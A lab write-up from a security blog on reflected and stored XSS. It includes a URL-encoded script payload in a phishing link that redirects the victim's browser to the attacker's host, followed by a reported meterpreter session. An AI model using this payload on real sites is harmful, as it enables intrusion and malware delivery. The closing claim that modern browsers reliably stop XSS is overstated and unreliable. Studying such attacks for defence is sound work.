Web Application Attack: Cross site scripting (aka XSS)

Security, Vulnerability Assessment and Pentest 2 Minutes

Reflected XSS

Reflected XSS is a technique that uses the web server’s domain and attached your own script onto the domain; the attacker then uses this link and sends to unsuspected user, once the user clicked on the link the script is executed by user’s browser.

Test for XSS

If xss is positive a popup will appear. WordPress has prevention against xss hence I cannot write down the script tags.
This means the site is vulnerable to xss.

Preparing a link that attaches attacker’s script

The attacker sets up a fake site that is a trusted site to victim. The attacker crafts an email that looks convincing and sends to a victim.

The victim clicked and access the link: http://192.168.20.17/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%2e%31%33%22%3c%2f%73%63%72%69%70%74%3e
Victim unwittingly clicked on run.
A meterpreter session was created on Attacker's machine.

About reflected xss attack

Modern browser stops xss effectively, the lab demonstration was successful with Winxp IE6.0. Using IE8.0 and higher version of IE, Chrome and Firefox can stop script from being executed by the browser. Noscript add-on is a good add-on for your firefox browser.

Stored XSS

Stored xss is a technique where the script is stored in the web server, whenever a user’s browser visits the web server, the script is executed by victim’s browser.

The attacker planted the script onto the web server.
script was planted. from now on, whomever click on the site the script will be sent to victim's browser and if the browser has no protection against script execution the victim's browser will simply execute the script.
A victim visited the blog and the victim's browser executed the script.

Conclusion

To prevent xss as a web user, you should use Google Chrome or Chromium browser, the Google Chrome browser is excellent inĀ suppressingĀ script execution. If you are using firefox, new firefox version also stop suspected script execution however I would recommend you to use Noscript add-on.

Published by cyruslab

Published

One thought on “Web Application Attack: Cross site scripting (aka XSS)

  1. Pingback: Web Application Attack: Cross site scripting (aka XSS)

Leave a comment